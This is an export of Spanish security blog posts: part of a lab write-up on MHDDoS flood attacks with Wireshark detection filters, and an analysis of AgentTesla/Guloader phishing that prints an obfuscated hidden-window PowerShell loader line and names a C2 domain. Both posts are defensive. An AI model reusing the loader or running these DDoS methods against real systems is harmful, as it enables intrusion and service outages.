importancia de realizar pruebas controladas y analizar cuidadosamente los resultados para identificar posibles errores de configuración antes de utilizarlos en un entorno más amplio. [Imagen: Ataque DDoS on MHDDOS y Proxies] La siguiente captura de pantalla muestra claramente la diferencia entre este ataque mal configurado y los posteriores ( Imagen de arriba ), donde corregí los parámetros y logré una distribución efectiva del tráfico a través de proxys. [Imagen: DDoS con MHDDOS] Como se puede observar en la imagen, el comportamiento del ataque cambia completamente al corregir la configuración de los proxys. Mientras que inicialmente todo el tráfico provenía de una única IP (la del servidor que ejecuta MHDDoS), tras ajustar correctamente la lista de proxys, el tráfico se distribuyó a través de múltiples direcciones IP, simulando un ataque distribuido. Esto refleja claramente cómo una configuración adecuada puede transformar un ataque DoS básico en un ataque DDoS mucho más sofisticado y difícil de mitigar. Lo más llamativo de estas pruebas es que ambos ataques, tanto el centralizado como el distribuido, resultaron sorprendentemente efectivos a pesar de las limitaciones de recursos de la máquina que ejecutaba MHDDoS. Estamos hablando de un entorno de laboratorio en el que el servidor atacante cuenta con apenas 4 GB de memoria RAM y 2 CPUs virtuales. Con esta configuración modesta, y sin llevar la máquina al límite, conseguimos generar un tráfico de ataque de hasta 700 Mbps, una cantidad significativa que sería suficiente para saturar infraestructuras mal preparadas. [Imagen: Ataque 700Mb DDoS] En la imagen que acompaña esta explicación, se puede ver cómo el throughput generado alcanza picos altos, independientemente de si el tráfico provenía de una única IP o estaba distribuido a través de proxys. Esto demuestra lo eficiente que puede ser MHDDoS incluso en condiciones de hardware limitadas. Además, subraya la necesidad de contar con estrategias de mitigación robustas que puedan manejar tanto ataques centralizados como distribuidos, ya que ambos pueden causar daños considerables dependiendo de las circunstancias. ## Ataques DDoS Para facilitar el análisis y el estudio de los distintos ataques realizados en este laboratorio, os voy a compartir las capturas de tráfico generadas directamente en el servidor durante cada uno de los ataques DDoS. Estas capturas muestran de manera clara cómo se comporta el tráfico en diferentes escenarios y en distintas capas. Mi intención es que estas capturas os sirvan como material educativo para profundizar en el análisis de los ataques y entender sus implicaciones. Podréis observar aspectos como el patrón de tráfico, el tamaño de los paquetes, la frecuencia de las solicitudes y cómo estas características varían según el método de ataque empleado. Esto os permitirá llegar a vuestras propias conclusiones sobre la efectividad de cada tipo de ataque y cómo podrían ser mitigados. El conocimiento es clave para fortalecer nuestras defensas de ciberseguridad , y el análisis de estos datos nos ayudará a estar mejor preparados frente a estas amenazas. No me centrare en todos los ataques, ya que muchos son específicos , como RDP , Minecraft ... etc , sino en los imprescindibles (para no hacer un post enorme ) os dejo la lista: [Imagen: Listado con iconos de los métodos de ataque DDoS de las capas 4 y 7] ## Ataques DDoS Capa 4 ### TCP Flood El ataque TCP Flood al puerto 80 fue el punto de partida de este laboratorio y, como mencioné anteriormente, incluso con una configuración básica, conseguimos generar hasta 700 Mbps de tráfico. Este ataque demuestra la potencia de herramientas como MHDDoS, y también sirve como una introducción para entender las diferencias clave entre los ataques centralizados y distribuidos. En la primera prueba, ejecutamos el ataque sin configurar una lista de proxys. Como resultado, todo el tráfico generado provenía directamente desde la IP del servidor que ejecutaba MHDDoS. Esto queda claramente reflejado en la captura de tráfico, donde cada paquete malicioso tenía la misma dirección IP de origen. NOTA: He tenido que subir los archivos a MEGA por el tamaño de los mismos [PCAP DOS TCP 80](https://mega.nz/file/zZQllSyR#uM9P0riI_dFJ9uyFy02bM__lL_AB6R1PloBykkaj4Cg) En la segunda prueba, configuramos correctamente una lista de proxys. Esta configuración transformó el ataque en un DDoS distribuido, donde el tráfico malicioso aparentaba venir de múltiples ubicaciones. En la captura de tráfico de esta prueba, podréis observar cómo las direcciones IP de origen son variadas, lo que dificulta considerablemente la mitigación. Este cambio convierte el ataque en una amenaza mucho más compleja, especialmente si la infraestructura objetivo no cuenta con soluciones avanzadas como WAFs distribuidos o servicios de mitigación DDoS en la nube. [PCAP DDOS TCP 80 - PROXYS](https://mega.nz/file/7YRm2IzC#6oUAV8jO6jGDFQtA3mQBeBdOf5l3d_B0fxAePkpbLN0) Un punto crítico que quiero destacar es que estas capturas, aunque realizadas en un entorno controlado, generaron cientos de Mbps en cuestión de segundos. Si dejáis correr este tipo de pruebas durante un minuto, podríais estar generando más de 10 gigas. Por ello, si decidís replicar estos experimentos, es fundamental hacerlo en un entorno completamente aislado y con las precauciones necesarias para evitar cualquier impacto no deseado. ### Análisis TCP Flood A continuación, realizaré un análisis detallado de las capturas de tráfico obtenidas durante los ataques de TCP Flood al puerto 80. En este análisis, exploraremos patrones clave que nos permiten identificar este tipo de ataque, como la repetitividad de las solicitudes, el uso de proxys, y el impacto en la red objetivo. A través de las capturas, podremos observar cómo varía el comportamiento del tráfico según la configuración empleada, proporcionando una visión clara de las características distintivas de estos ataques. Las imágenes que se incluyen servirán como referencia para entender mejor estos patrones y cómo se reflejan en el tráfico capturado.Lo haremos de igual forma en el resto de ataques que iremos viendo. - Conexiones masivas y cortas: Busca múltiples solicitudes entrantes (SYN) al puerto 80 sin la correspondiente finalización (ACK). tcp.flags.syn == 1 and tcp.flags.ack == 0 [Imagen: Paquetes SYN sin ACK] - Fuentes sospechosas: Analiza si hay un número anormalmente alto de direcciones IP de origen (indicador de proxys o bots): Ve al menú: Statistics > Endpoints, selecciona la pestaña IPv4 y verifica la columna de paquetes. [Imagen: Estadistica paquetes DDoS] - Filtrado: Podríamos aislar el trafico sospechoso, combinado con paquetes duplicados. tcp.flags.syn == 1 and tcp.dstport == 80 and frame.time_delta < 0.01 > Esto muestra tráfico con muy poco tiempo entre paquetes, típico de ataques de inundación También podéis ver la distribución geográfica de las IPs en Wireshark, con servicios tan conocidos como MaxMind y su Base de Datos GeoLite2 , añadiéndolo a Wireshark, algo que nos ahorrará mucho tiempo en muchos casos en los que no tengamos acceso a los sistemas como FW o ADDoS , o para ver si la concordancia de países es correcta, con el fin de bloquear por país. [Imagen: MaxMind GeoIP Wireshark] Lo que nos dará mucha información en puntos como Endpoints [Imagen: Localización ataque DDoS] ## Proxificación en los ataques DDoS Cuando comencé a estudiar los protocolos UDP utilizando MHDDoS, me encontré con una realidad que me llevó a reflexionar sobre el objetivo principal de este post: la evolución de los ataques de denegación de servicio desde las capas 3-4 hacia la capa 7. En herramientas como MHDDoS, los protocolos que permiten ser proxificados para realizar ataques distribuidos en capa 4 son relativamente limitados. Aunque TCP, como ya exploramos anteriormente, es uno de los principales ejemplos, no se puede decir lo mismo de otros protocolos como UDP, que no presentan opciones de proxificación. Esto reduce las posibilidades de ejecutar ataques distribuidos en estas capas utilizando proxys. Sin embargo, en capa 7, la historia cambia radicalmente. En este nivel, prácticamente todos los métodos de ataque disponibles en MHDDoS ( Trasladable casi al 100% al resto ) pueden ser proxificados, incluyendo tipos como SOCKS4, SOCKS5 o incluso HTTP. Esto significa que la capacidad de distribuir ataques en capa 7 es mucho mayor y, por ende, estos ataques son significativamente más complejos y difíciles de mitigar. Además, la facilidad con la que podemos configurar esta distribución amplifica el impacto potencial de estos ataques. [Imagen: Tablas comparando qué métodos DDoS de capa 4 y 7 funcionan con proxies HTTP y SOCKS] > Lo que quiero resaltar con esto es una tendencia clara que ya comenzó a manifestarse en 2024, pero que será aún más pronunciada en 2025: el aumento de ataques de denegación de servicio enfocados en la capa 7. Este cambio representa un reto enorme para las infraestructuras actuales, ya que no solo son más difíciles de identificar y mitigar, sino que también permiten una distribución mucho más amplia con recursos mínimos. Por eso, es imperativo que empecemos a centrar nuestra atención en este tipo de amenazas, ya que serán uno de los principales desafíos en el panorama de la ciberseguridad el próximo año. Con esto , solo nos quedaba por ver el de una forma distribuida, CPS | Open and close connections with proxy y CONNECTION | Open connection alive with proxy . Os traslado ciertas pinceladas, pero podeis ver y analizar todos en vuestros laboratorios ( Si no se haría infinito el post , sorry ). ### Ataque DDoS CPS | Open and close connections with proxy Sumado a los filtros anteriormente vistos , en este tipo de ataque, como su nombre indica, se basa en abrir y cerrar multiples conexiones mediante proxy. En el que el factor volumétricos no es tan significativo como el visto en TCP, basándose en intentar sobrecargar el servicio o los sistemas. - Conexiones que terminan rápidamente : Con tráfico FIN o RST inmediatamente después del handshake. [Imagen: Fin rápido después de un ACK] Pudiendo filtrarlo facilmente : tcp.flags.fin == 1 or tcp.flags.reset == 1 [Imagen: Filtrado Fin ACK sobre IP] Os dejo la captura para el análisis: [PCAP DDOS CPS | Open and close connections with proxy](https://mega.nz/file/TUAzgQKY#mL2XWs6kSgyRcOXOjS_nLLHUSPxFE3lZaarFoPtaCYo) Como dato curioso, al observar el gráfico generado por el ataque, se puede notar que, aunque volumétricamente no alcanza siquiera algunos megas, su característica más llamativa es su forma dentada. Esto se debe a los picos y cortes abruptos que se reflejan en el tráfico, causados por las conexiones intermitentes y las desconexiones propias del uso de proxys. Este patrón, que se asemeja a los dientes de una sierra, es un indicador claro del comportamiento de este tipo de ataques. Os dejo el gráfico para que podáis analizarlo, ya que representa de manera visual cómo las conexiones y los cortes configuran un tráfico tan particular. [Imagen: Ataque DDoS CPS] ### Ataque DDoS CONNECTION | Open connection alive with proxy Este tipo de ataques , es facilmente identificable, ya que se basa en dejar conexiones abiertas por un largo periodo de tiempo. Podríamos identificarlo en nuestros sistemas balanceadores , o también mediante una simple captura de tráfico, vamos al lio: - Conexiones que no se han cerrado: Conexiones abiertas (sin FIN ni RST) tcp.flags.fin == 0 and tcp.flags.rst == 0 - Identificar Keep-Alive : Filtra paquetes TCP con Keep-Alive tcp.analysis.keep_alive Al analizar el Flag keep_alive , no os asusteis , a nosotros solo nos venia de 5 IPs de todas, esto es debido a que el mecanismo Keep-Alive es opcional. No todos los sistemas o aplicaciones lo implementan, y puede ser que no todos los proxy sean capaces de retransmitirlo. También en los ataques, se evita enviarlo con el fin de que pase desapercibido, pero no esta de mas buscarlo: [Imagen: Flag Keep Alive en paquetes] El flag tcp.analysis.keep_alive es una interpretación de Wireshark, no un atributo inherente de los paquetes TCP, si los paquetes no cumplen los criterios específicos de Wireshark (e.g., carga útil específica o tiempo entre paquetes), no se marcarán como tcp.analysis.keep_alive, por lo que es recomendado buscar de más formas: - Tráfico con bajo flujo de datos: Filtraremos las conexiones TCP que permanecen abiertas pero tienen poca o ninguna carga útil tcp.len == 0 O también podemos revisar la duración de las conexiones en Statistics > Conversations y en la pestaña TCP, revisando la columna de Duration con el fin de buscar conexiones con tiempos extremadamente largos: [PCAP DDoS CONNECTION | Open connection alive with proxy](https://mega.nz/file/WQoFWKKQ#DyBsjW4lRYBeDhc9umiZqxWIpWOdTFiuKi8067rzMbw) [Imagen: Duración conversacionales Paquetes] ## Ataques DDoS Capa 7 Llegamos finalmente a los ataques de capa 7 (Aplicación) de denegación de servicio. Este post, aunque extenso, refleja días de análisis y reflexión sobre cómo estos ataques están marcando un antes y un después en el panorama de la ciberseguridad. No analizaremos todos los tipos de ataques L7, pero sí algunos representativos para comprender su impacto real en los sistemas y por qué los enfoques tradicionales anti-DDoS no son suficientes para detenerlos. Uno de los desafíos más evidentes de los ataques L7 es que los atacantes están evolucionando sus tácticas. En muchos casos, comienzan saturando las capas inferiores (L3-L4) para desviar la atención de los sistemas de mitigación y, cuando estos están enfocados en manejar el volumen de tráfico en esas capas, redirigen el ataque hacia L7. Aquí es donde los sistemas convencionales fallan, ya que no están diseñados para gestionar este tipo de tráfico malicioso orientado a la capa de aplicación. El resultado es que, incluso con medidas como el filtrado de tráfico por país o región, los atacantes encuentran formas de evadir estas barreras, utilizando IPs distribuidas de forma precisa, por ejemplo, únicamente de países como España o Estados Unidos, donde el negocio objetivo opera. No podemos seguir confiando en sistemas antiDDoS que solo abordan un aspecto del problema, ni en estrategias que dependen de la colaboración fragmentada entre diferentes ISPs o equipos con capacidades limitadas para manejar ataques distribuidos en capas superiores. > La realidad es que, para 2025, debemos evolucionar hacia soluciones integrales capaces de mitigar en todas las capas de manera eficiente, sin necesidad de depender de múltiples contratos o infraestructuras especializadas que aumenten la complejidad y reduzcan la eficacia. Por otro lado, los equipos encargados de gestionar la mitigación de DDoS en capas inferiores no suelen estar preparados para enfrentar L7. Esto subraya la importancia de unificar esfuerzos entre los sistemas de defensa existentes y nuevas soluciones enfocadas en la capa de aplicación. Solo de esta manera podremos enfrentar los retos que los ataques de denegación de servicio nos plantearán en los próximos años. > En mi opinión, los ataques L7 serán un punto clave en el panorama de ciberseguridad para 2025. La capacidad de nuestras infraestructuras para mitigar este tipo de amenazas definirá su resiliencia. Este es el momento de centrar nuestros esfuerzos en esta tecnología, evolucionar nuestras estrategias y estar preparados para enfrentar este cambio inevitable en el mundo de la ciberseguridad. ### Ataque GET Flood Es curioso ver como se comportan los sistemas en base a los distintos ataque, uno saturan la memoria , otros la red ... y en este caso , me dejo perplejo con la subida de CPU de más de 50% en una maquina relativamente grande: [Imagen: +50% CPU Ataquen DDoS GET] Donde a nivel volumétrico , posiblemente pasaría desapercibido en un sistema ADDoS tradicional, y donde como podemos ver, con una pagina simplísima ( Solo tiene un H1 ) , es capaz de sobrecargar una CPU un 50% [Imagen: Volumetrico L7 GET] No hablamos de Gb , si no de unos simples Mb , podríamos llegar a realizar un core dump a algún sistema. [PCAP DDOS GET L7](https://mega.nz/file/PEREybIJ#K3XF9PiBYwPbubCOmDbj43LLZnwD5osqxwVvDEDhLfI) Como se puede apreciar a simple vista , la captura , incluso sin ningún tipo de filtro, cambia significativamente , mostrándonos un indicio claro del tipo de ataque que podemos estar recibiendo: [Imagen: Ataque DDoS GET Capa 7] MHDDOS tiene la capacidad de modificar useragents o incluso trasladar distintos referrer. Luego si no me alargo mucho, intentaremos pasar por ello, pero dejando ver que podría ser un ataque GET, pasémos a filtrar directamente: http.request.method == "GET" [Imagen: Filtrado GET Wireshark] o podríamos buscar User-Agents y así , intentar hacer un listado de filtros ( Podríamos hacerlo en ZUI , que me gusta mucho ), buscando los User-Agents que tienen configurados por defecto ( Aunque podria modificarse fácilmente ): http.user_agent contains "Mozilla" [Imagen: Wireshark filtrando por user-agent Mozilla en una inundación de peticiones GET al puerto 80] Esta parte nos valdría para prácticamente todos los ataque L7 , donde podríamos ver de una forma visual ciertas estadísticas, como los paths más solicitados ( En este caso es el inicio , pero podría ser otros , como vemos con NoName ): [Imagen: Estadísticas Path más atacado DDoS L7] De igual forma , podemos ver en estadística > http > métodos , el resultado de las peticiones y métodos utilizados: [Imagen: Estadísticas Métodos HTTP] ### Ataque DDOS POST Flood No tengo configurado la web para aceptar métodos POST , siendo más efectivo en páginas con dicho método, o sistemas tipo API Gateway , pudiendo infringir "más dolor". [Imagen: Gráfica DDOS POST] Como dato curioso, al ser POST , apreciamos la ausencia de datos en "enviado" por parte del servidor. El ataque a nivel de CPU , y posiblemente por la falta de posibilidad de usar metodos POST, no llego a incrementarse ni un 10% respecto a su uso normal. Al contrario que GET, en el que el ratio de respuesta de códigos 200 era casi de 100% , en este caso, vemos un incremento normal de errores 5xx. [Imagen: Errores POST Ataque DDOS] [PCAP DDOS POST L7](https://mega.nz/file/rZgQkRxK#XJU3Igam-ACHP1T218C8h--Qx2J0BxRzXyB5SQndDfA) ## Ataque DDOS Random HEX Los ataques DDoS de Random Hexadecimal son una variante de los ataques de capa 7 diseñados para saturar aplicaciones web mediante la generación de solicitudes HTTP con datos aleatorios en los parámetros, encabezados o incluso en el cuerpo de las solicitudes. La clave de estos ataques está en que los valores aleatorios, usualmente representados en formato hexadecimal (por ejemplo, 0xABCDEF), dificultan que las contramedidas basadas en patrones predecibles (como WAFs) detecten o filtren el tráfico malicioso. Un ejemplo seria hxxp://victima.com/page?param=0x1A3F5B Dado que cada solicitud parece única debido al contenido aleatorio, es difícil implementar reglas basadas en patrones sin afectar el tráfico legítimo. [Imagen: DDOS Randon HEXADECIMAL] Con un simple vistazo , podemos ver y analizar que existen multitud de peticiones GET ( Ya vimos antes cómo buscarlas ) , y veremos ahora en estadísticas , y como hemos dicho, la multitud de peticiones únicas: [Imagen: Request únicos ataque DDOS Randon HEX] Entre los códigos de error , vemos multiples "bad request" 4xx . Como dato reseñable también, la gráfica que nos deja. Si bien como en el método post, yo no tengo ningúna uri en la que pueda usar parámetro, la gráfica nos deja ver la cantidad de peticiones GET , pero al contrario que en el propio ataque GET , al ser paths distintos y no devolver 200, genera una sierra dentada en la que al terminar el ataque , remite en envio: [Imagen: Panel de Netdata mostrando picos de tráfico de red saliente durante un ataque DDoS] Realice , distintas replica ( 1 - 2 ) en las que posteriormente amplifiquelo más jugando con el --rpc de MHDDOS , aun así , el echo de no tener variables o métodos, no infringe dolor en el servidor . Podríamos buscar también indicios en Wireshark con: http.request.uri contains "0x" http.request.header contains "0x" [PCAP DDOS RANDON HEXADECIMAL](https://mega.nz/file/icQnCIDK#_jP1jlHWKYnl0YHboMXcVWrGjm7y1pjY6KrzTUmPoSo) ## Ataque DDOS Paquetes gran tamaño El método STRESS en MHDDoS es un tipo de ataque diseñado específicamente para saturar servidores mediante el envío de paquetes HTTP con un tamaño de bytes considerablemente grande. Este método apunta a sobrecargar no solo el ancho de banda del servidor, sino también sus recursos internos, como memoria y capacidad de procesamiento, al obligarlo a manejar solicitudes masivas con cargas de datos significativas. Es particularmente eficaz contra servidores web mal configurados o con capacidades limitadas para manejar grandes volúmenes de tráfico. En esencia, el método STRESS combina características de ataques volumétricos (por el gran tamaño de los paquetes) con ataques de capa 7 (al usar protocolos HTTP), lo que lo convierte en una herramienta versátil para ataques de denegación de servicio distribuidos. [Imagen: Paquetes de Gran Tamaño] Para detectar el tráfico generado por el método STRESS en una captura de tráfico, podemos: - Filtrar solicitudes HTTP grandes: Solicitudes HTTP cuyo tamaño sea mayor a lo esperado. ( El posible que no nos muestre la información el filtro , por lo que recomiendo verlo en estadísticas ) http.content_length > 100000 Siendo mejor buscar por tamaño de paquetes: frame.len > 1500 Esto nos permitirá observar tráfico que pueda estar saturando el ancho de banda. - Estadísticas de tamaño de paquetes: En Statistic > Packet Lengths , aplicando el filtro de tamaño grande, podremos ver una distribución mucho más clara. [Imagen: Distribución de tamaño de paquetes grandes] [PCAP DDOS PAQUETES DE GRAN TAMAÑO](https://mega.nz/file/vJBj0LBS#yH3NQsEXAtAGd1mo8B0xdeJOp2bRJ-hHZzJduLXjIf0) ## Ataque DDOS Metodo HEAD El uso de los métodos HTTP HEAD y CONNECT en los ataques recientes es un ejemplo claro de cómo los atacantes están utilizando estrategias menos comunes pero igualmente efectivas para explotar los sistemas. Estos métodos, aunque diseñados con propósitos legítimos, pueden ser manipulados para infligir un impacto desproporcionado en la infraestructura objetivo. El método HEAD es una solicitud HTTP diseñada para obtener los encabezados de una respuesta sin incluir el cuerpo del contenido. Esto lo hace más ligero en términos de transferencia de datos, ya que no devuelve el contenido completo de la página solicitada. Sin embargo, el servidor aún procesa la solicitud como si fuera una petición completa, generando los mismos encabezados que una respuesta GET. Durante nuestras pruebas, vimos que una máquina con amplios recursos pasó de un uso de CPU de menos del 1% a más del 50% en cuestión de segundos, simplemente gestionando un flujo constante de solicitudes HEAD. Lo más significativo es que, en términos de volumen de ancho de banda, apenas se notó un pico de 130 MB, lo que está lejos de ser alarmante para los sistemas tradicionales de detección de anomalías DDOS. [Imagen: Ataque HEAD] Este comportamiento pone de manifiesto una evolución en las tácticas de los atacantes. > Ya no se trata solo de saturar el ancho de banda con ataques volumétricos, ahora los ataques están diseñados para colapsar los recursos internos del sistema de manera más sutil pero igualmente devastadora. [Imagen: Metodo HEAD] Podemos localizarlo facilmente : http.request.method == "HEAD" [PCAP DDOS HEAD](https://mega.nz/file/edgBERZA#TvHMkyLi2uB5BYpM9eFgHQim83M5kKNYuUe2acriNyI) ### Ataque DDOS SlowLoris y Downloader El ataque SLOWLORIS se centra en mantener abiertas múltiples conexiones HTTP al servidor objetivo, utilizando la menor cantidad de recursos posible por parte del atacante. El truco detrás de SLOWLORIS es enviar encabezados HTTP incompletos, lo que obliga al servidor a mantener las conexiones abiertas en espera de que se complete la solicitud. Esto puede saturar el pool de conexiones del servidor, dejando al resto de los clientes legítimos sin acceso. El método DOWNLOADER en MHDDoS es muy similar a SLOWLORIS en su filosofía, pero agrega un enfoque adicional: el envío de solicitudes diseñadas para que el servidor descargue grandes cantidades de datos desde su propia infraestructura. Este ataque obliga al servidor a usar su ancho de banda y recursos internos para manejar solicitudes aparentemente legítimas, pero manipuladas para que se conviertan en herramientas de autoexplotación. [Imagen: Ataque SlowLoris y Downloader MHDDOS] En los gráficos que hemos generado, se pueden observar claramente las diferencias entre los ataques Slowloris y Downloader en términos de su impacto en la infraestructura, tanto en CPU como en memoria. Los gráficos etiquetados como 1 y 3 representan el ataque de Slowloris, mientras que 2 y 4 corresponden al ataque de Downloader. En términos de throughput, ambos ataques muestran un consumo de red prácticamente imperceptible, lo que los hace muy difíciles de detectar mediante sistemas tradicionales que monitorean el uso del ancho de banda. Sin embargo, es en los gráficos de CPU y memoria donde se aprecia la verdadera naturaleza de estos ataques. - Slowloris: El ataque genera un patrón de uso muy distintivo, con picos pronunciados que llegan a consumir entre el 60% y el 70% de la CPU. Este comportamiento es curioso porque, a diferencia de otros ataques que suelen ser constantes en su impacto, Slowloris muestra un patrón irregular con momentos de alta intensidad seguidos de cierta recuperación. Este patrón irregular sugiere que el servidor está luchando por manejar las conexiones abiertas, probablemente debido a la naturaleza persistente de las solicitudes incompletas del ataque. - Downloader: El ataque Downloader muestra un comportamiento más constante y predecible. Aunque también consume recursos de CPU y memoria, lo hace de manera menos agresiva en comparación con Slowloris. Esto es porque Downloader no fuerza al servidor a mantener conexiones abiertas, sino que lo obliga a gestionar solicitudes de descarga repetitivas, lo que genera una carga más uniforme. Uno de los puntos claves de mitigación , es configurar límites estrictos en las conexiones y el tiempo de espera (Keep-Alive y timeout), algo que nos ahorrará muchos dolores de cabeza. [PCAP DDOS SLOW LORIS](https://mega.nz/file/7IQ0nYYD#_DJTyQ2Kh6k8IiIfiq2ntr3cldFgWbpewPwiv3d2oDM) ## 2025 - El año en que cambiaras o deberías tus sistemas DDoS A lo largo de este post, hemos explorado en profundidad cómo han evolucionado los ataques de denegación de servicio (DoS y DDoS) desde enfoques volumétricos en capas 3 y 4 hasta tácticas más sofisticadas y dirigidas en capa 7. Utilizando herramientas como MHDDoS, hemos visto cómo estas amenazas se han diversificado, y he dejado múltiples ejemplos y capturas para que podáis analizarlas en detalle. Los ataques ya no se tratan únicamente de saturar el ancho de banda con tráfico masivo, ahora, su verdadera eficacia reside en el uso estratégico de métodos complejos que explotan la capacidad de procesamiento y los recursos internos de los sistemas, llevando servidores, firewalls y balanceadores al límite sin necesidad de grandes volúmenes de datos. Este cambio nos obliga a replantearnos por completo cómo diseñamos y gestionamos nuestras estrategias de mitigación DDoS. Uno de los puntos clave que quiero destacar es la necesidad de unificar la gestión de ataques de capas 3, 4 y 7. Hasta ahora, la mayoría de los sistemas de defensa estaban diseñados para lidiar con ataques volumétricos clásicos, pero como hemos demostrado en este análisis, este enfoque es insuficiente frente a las amenazas actuales. No basta con sistemas separados para diferentes capas, debemos buscar soluciones integrales o, en su defecto, asegurarnos de que nuestros equipos de mitigación puedan trabajar de manera coordinada. Mi tendencia para 2025 es clara: debemos evolucionar hacia tecnologías que combinen capacidades de mitigación en todas las capas, ya sea a través de un único proveedor o mediante una integración eficiente de soluciones como WAFs, sistemas de capa 7 y defensa perimetral en 3 y 4. Además, para multinacionales o empresas con presencia global, esta unificación es aún más crítica, ya que contar con sistemas dispersos e independientes por región solo añade complejidad y reduce la eficacia frente a ataques distribuidos. Quiero también resaltar que, aunque la inteligencia artificial parece ser una tendencia emergente, la clave real para 2025 no es depender de sistemas futuristas, sino mejorar y evolucionar nuestras tecnologías actuales para adaptarnos a estas nuevas tácticas. En este sentido, debemos priorizar inversiones en herramientas que no solo detecten, sino que también respondan de forma proactiva a las amenazas en todas las capas. Este enfoque garantizará una mayor resiliencia y optimización de recursos frente a un panorama de amenazas en constante cambio. Finalmente, quiero agradeceros por acompañarnos en este extenso post que comenzó en 2024 y que concluye ahora en 2025. Este post me ha llevado días de trabajo, no solo escribiéndolo, sino también realizando los laboratorios y pruebas que respaldan cada punto expuesto. Mi propósito para este nuevo año es seguir creando contenido técnico y práctico como este, que no solo explique conceptos, sino que también los demuestre con ejemplos reales. Os deseo a todos un fantástico 2025 lleno de aprendizajes y retos, y espero que este análisis os ayude a reflexionar sobre la importancia de evolucionar vuestras infraestructuras y estrategias de defensa. Si algo debe ser una prioridad para vuestros próximos presupuestos, es sin duda la adaptación a esta nueva generación de ataques de denegación de servicio. ¡Feliz año nuevo y sigamos construyendo juntos un futuro más seguro! --- # ¡CUIDADO! Agenttesla utilizados en falsos correos de BBVA y Banco Santander URL: https://ciberseguridad.blog/cuidado-agenttesla-utilizados-en-falsos-correos-de-bbva-y-banco-santander/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2024-10-20 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > ⚠️ Analiza cómo AgentTesla usa correos falsos de BBVA y Santander para infiltrarse. Aprende a detectar phishing y protegerte del malware. Hola a tod@s! Esto que he visto recientemente me ha hecho acordarme de este POST. Esta vez el troyano desplegado ha sido otro, Agenttesla, ¿Queréis ver los parecidos razonables que hay en los análisis? Podemos verlo en los siguientes enlaces: BBVA-Confirming Facturas Pagadas al Vencimiento.msg (MD5: 5F8006C8EA7EE73EA055C648B5533EFE): [Imagen: BBVA-Confirming Facturas Pagadas al Vencimiento] Confirmación transferencia interbancaria_ (Banco Santander).msg (MD5: DFB5332C1EB3F5B1A8EED297CFDBD0B3): [Imagen: Confirmación transferencia interbancaria_ (Banco Santander)] En los asuntos de los 2 correos podemos ver tanto BBVA como Banco Santander. Veamos cuanto se parecen los correos. [Imagen: Marcas SPF , DKIM , DMARC] Esta vez hay más diferencias entre los 2, se enviaron en diferentes horas y desde distintos servidores. Eso sí, algo fundamental es comprobar las marcas de seguridad SPF, DKIM y DMARC, todas ellas han fallado, lo que indicaría una cosa: ¡¡¡PHISHING!!! Veamos esos adjuntos, el del BBVA es una página HTML: [Imagen: Código HTML Malware] Lo descargamos, se trata de un fichero RAR con un exe dentro, al igual que el que estaba adjunto en el supuesto correo del Banco Santander. [Imagen: Adjuntos BBVA - Banco Santander] Ambos ficheros pesan lo mismo, a simple vista, y la fecha no coincide, como tampoco lo hacía los envíos de los correos. Veamos si son el malware final o algún tipo de packer. [Imagen: Peso Banco Santander] [Imagen: Peso BBVA] Ahora ya vemos que no se trata de ficheros parecidos, en el primero de utiliza el software de Nullsoft NSIS y en el segundo AutoIT. Si os fijasteis en las capturas de Any.run, el del BBVA no sacaba a la familia del malware, mientras que en el del Banco Santander sí, Agenttesla. Así que de este último, os mostraré como sacar el script ya que como os imaginaréis no está directamente accesible, para ello hay que utilizar AutoIT Extractor. [Imagen: AutoIT Extractor] Ahora ya se puede entender un poco mejor lo que hace, he dicho un poco mejor 😄 Por lo que se ve, cogerá esa variable, la tratará e inyectará el malware final, Agenttesla, en la memoria del proceso RegSvcs.exe. [Imagen: Proceso RegSvcs.exe] Lo raro es que no ha sacado la configuración, por lo que si queréis ver cual es su C2, habrá que ir a buscarlo en las conexiones de red. [Imagen: Wiresark AgentTesla] El otro malware no pasa en Any.run de Guloader. [Imagen: Ejecución de Guloader Any.run] Vamos a ver más en detalle lo que aparece en ese comando Powershell: "powershell.exe" -windowstyle hidden "$Oplgningen=Get-Content -raw 'C:\Users\admin\AppData\Local\Temp\carinal\Coracosteon\Snedkererede\Sabbataftenernes.Feo';$Monanthous=$Oplgningen.SubString(56405,3);.$Monanthous($Oplgningen)" Necesitamos saber donde se encuentra ese fichero tan feo con nombre “Sabbataftenernes.Feo”. No es que sea feo el fichero, es que tiene esa extensión 😏 Tenemos por un lado el fichero de script utilizado por NSIS (se puede analizar para comprender el comportamiento) y dentro del directorio que se ve en el raíz aparece nuestro fichero “Sabbataftenernes.Feo”. [Imagen: Sabbataftenernes.Feo] El comando Powershell, guarda en una variable el contenido del fichero, obtiene una cadena con un substring dentro del mismo fichero (os lo adelanto, es IEX) y lo guarda con otra variable y se lo pasa como argumento a esa nueva variable. Sería IEX (contenido de Sabbataftenernes.Feo), lo que continuaría con otra ejecución con Powershell. [Imagen: Código Guloader] Bienvenidos a Guloader, a partir de ahora se producen varias ejecuciones Powershell, el código desofuscado de esto sería: [Imagen: Código desofuscado Parte 1] [ ... ] [Imagen: Código desofuscado Parte 2] Le prestamos atención a esta línea: [Imagen: Linea de especial interés en el Malware] Ese valor que aparece, 153 en decimal será utilizado como key en una función XOR con el código hexadecimal que se ve. Utilizamos Cyberchef para obtener el descifrado. [Imagen: Descifrado con CyberChef] Guloader utiliza 2 shellcodes, una como cargador para descifrar la segunda. Si quereis utilizar el script que sale del anterior, hay que añadirle las funciones y variables que se encuentran en el mismo ya que las necesitará. Finalmente quedará algo parecido a esto: [Imagen: Shellcodes] He comentado la línea que ejecutaría directamente el malware, he preferido guardar las 2 Shellcodes. > El resultado de todo esto una vez ejecutado, sería Agenttesla inyectado en la memoria del proceso RegSvcs.exe. [Imagen: Agenttesla inyectado en la memoria del proceso RegSvcs.exe] Si lo abrimos con DnSpy veremos que se trata de Agenttesla y que el C2 es el mismo que veíamos en el malware del Banco Santander. [Imagen: Código descompilado en dnSpy mostrando el host FTP elquijotebanquetes.com usado por Agent Tesla] > ¿Serán exactamente la misma muestra? Pues sí, como podéis observar. [Imagen: Muestra BBVA] [Imagen: Muestra Santander] Por lo tanto, al igual que veíamos como en anteriores ocasiones utilizaban Snake Keylogger, ahora le ha tocado el turno a Agenttesla en correos que simulan provenir de entidades como BBVA y Banco Santander, podéis leer más sobre este malware aquí. Espero que os haya gustado y nos vemos en el siguiente POST ¡¡¡Hasta otra!!! --- # Security Hyperautomation , la evolución del SOAR ya está aquí URL: 